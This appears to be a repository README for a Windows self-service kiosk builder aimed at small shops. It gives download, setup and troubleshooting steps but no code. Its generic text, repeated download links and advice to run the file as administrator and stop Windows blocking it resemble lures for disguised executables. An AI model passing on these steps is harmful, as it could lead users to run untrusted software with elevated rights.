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🛒 22B-Kiosk-Self-Service-Kiosk-Builder-for-Small-Businesses- - Simple kiosk setup for busy shops

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📥 Download

Use this link to visit the page and download the app:

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🖥️ What this app does

22B-Kiosk is a self-service kiosk builder for small businesses on Windows.

It helps you set up a simple kiosk screen for customers. You can use it for:

  • Product browsing
  • Order entry
  • Menu display
  • Service check-in
  • Basic self-service use in a shop, cafe, stall, or front desk

The app is built for quick setup. It keeps the screen clean and easy to use.

✅ What you need

Before you start, check that your PC has:

  • Windows 10 or Windows 11
  • A mouse and keyboard
  • Internet access for the download
  • At least 4 GB of RAM
  • Enough free disk space for the app and its files
  • A screen or monitor for kiosk use

For best results, use a PC that stays plugged in and connected to power.

🚀 Get started

  1. Open the download page: Download 22B-Kiosk-Self-Service-Kiosk-Builder-for-Small-Businesses-

  2. Look for the latest release or app file on the page.

  3. Download the Windows version to your computer.

  4. If the file comes in a .zip folder, right-click it and choose Extract All.

  5. Open the extracted folder.

  6. Find the app file and double-click it to run.

  7. If Windows asks for permission, click Yes or Run.

  8. Follow the on-screen setup steps.

🧭 First-time setup

When the app opens for the first time, you may need to:

  • Choose your kiosk mode
  • Set the screen size
  • Pick a layout for your business
  • Add your products, services, or menu items
  • Set your logo or store name
  • Choose what customers can touch or see

Keep the setup simple at first. You can add more later.

🛠️ How to use it

After setup, your kiosk can run in a few common ways:

  • Browse mode: customers look through items on screen
  • Order mode: customers select items and send an order
  • Check-in mode: customers enter a name or booking detail
  • Display mode: the screen shows your menu or service list
  • Assist mode: staff can help at the same station

Use the mode that matches your business.

🧩 Typical kiosk workflow

A simple kiosk flow looks like this:

  1. Customer walks up to the screen
  2. Customer taps an option
  3. Customer views products or services
  4. Customer fills in details
  5. Customer confirms the action
  6. Staff receives the result or the screen resets

This setup works well for small shops that want less wait time at the counter.

🔒 Safe setup tips

To keep the kiosk stable:

  • Use a full-screen display
  • Turn off sleep mode on the kiosk PC
  • Keep the device on a steady power source
  • Use a simple mouse or touch screen
  • Limit access to the desktop
  • Keep the kiosk area clear

If you use the app in a public space, place the PC where staff can reach it.

⚙️ Common settings

You may see settings such as:

  • Language
  • Screen resolution
  • Button size
  • Timeout before reset
  • Theme or color style
  • Default home screen
  • Input fields for customer details

Use larger buttons if customers will use touch input.

📁 File layout

After download and extraction, the folder may include:

  • The main app file
  • Support files
  • Icons or images
  • Config files
  • A readme or help file

Keep all files in the same folder. Do not move only one file out of the set.

🖱️ If the app does not open

Try these steps:

  1. Check that the file finished downloading
  2. Make sure you extracted the zip folder
  3. Right-click the app and choose Run as administrator
  4. Check that Windows is not blocking the file
  5. Restart the PC and try again
  6. Download the file again if it looks broken

If the app still does not open, move the folder to a simple path like C:\Kiosk\

🧼 Keep the kiosk ready

A kiosk works best when it stays clean and easy to use:

  • Remove unused buttons
  • Keep text short
  • Use large font sizes
  • Show only the actions customers need
  • Test the flow before you use it with real customers

A simple screen helps people move through it fast.

📌 Good uses

22B-Kiosk fits many small business setups, such as:

  • Coffee shops
  • Snack bars
  • Food stalls
  • Salon check-in desks
  • Small retail stores
  • Service counters
  • Event stands

It works best when you want a clear screen and a simple customer path.

🧪 Suggested test run

Before you use the kiosk with customers:

  1. Open the app
  2. Go through each screen
  3. Tap every button
  4. Try a full customer flow
  5. Check the reset behavior
  6. Make sure the text is easy to read
  7. Confirm the screen fits your monitor

This helps you catch layout issues before opening the kiosk to the public

🧾 Basic setup checklist

  • Download the app
  • Extract the files
  • Open the main app
  • Set your kiosk layout
  • Add your business items
  • Test the customer flow
  • Put the app on the kiosk PC
  • Lock down the device for public use

🧰 Troubleshooting

The screen is too small

Increase the display scale or use a higher resolution layout

Buttons are hard to tap

Use larger button sizes and more spacing

Text looks cut off

Check the monitor size and adjust the layout

The app resets too fast

Increase the timeout in settings

The kiosk is not touch friendly

Test with a touch screen and raise the button size

🏷️ Version use

When a newer version appears on the download page, use the latest one for:

  • Bug fixes
  • Better screen layout
  • Smoother kiosk use
  • Updated files

Always keep one backup copy of your old setup before you update

📎 Download again

If you need to reinstall or set up another PC, use the same page here:

Download 22B-Kiosk-Self-Service-Kiosk-Builder-for-Small-Businesses-

🧭 Quick path for Windows

  1. Visit the download page
  2. Download the Windows file
  3. Extract the folder if needed
  4. Open the app
  5. Set up your kiosk
  6. Run it in full screen

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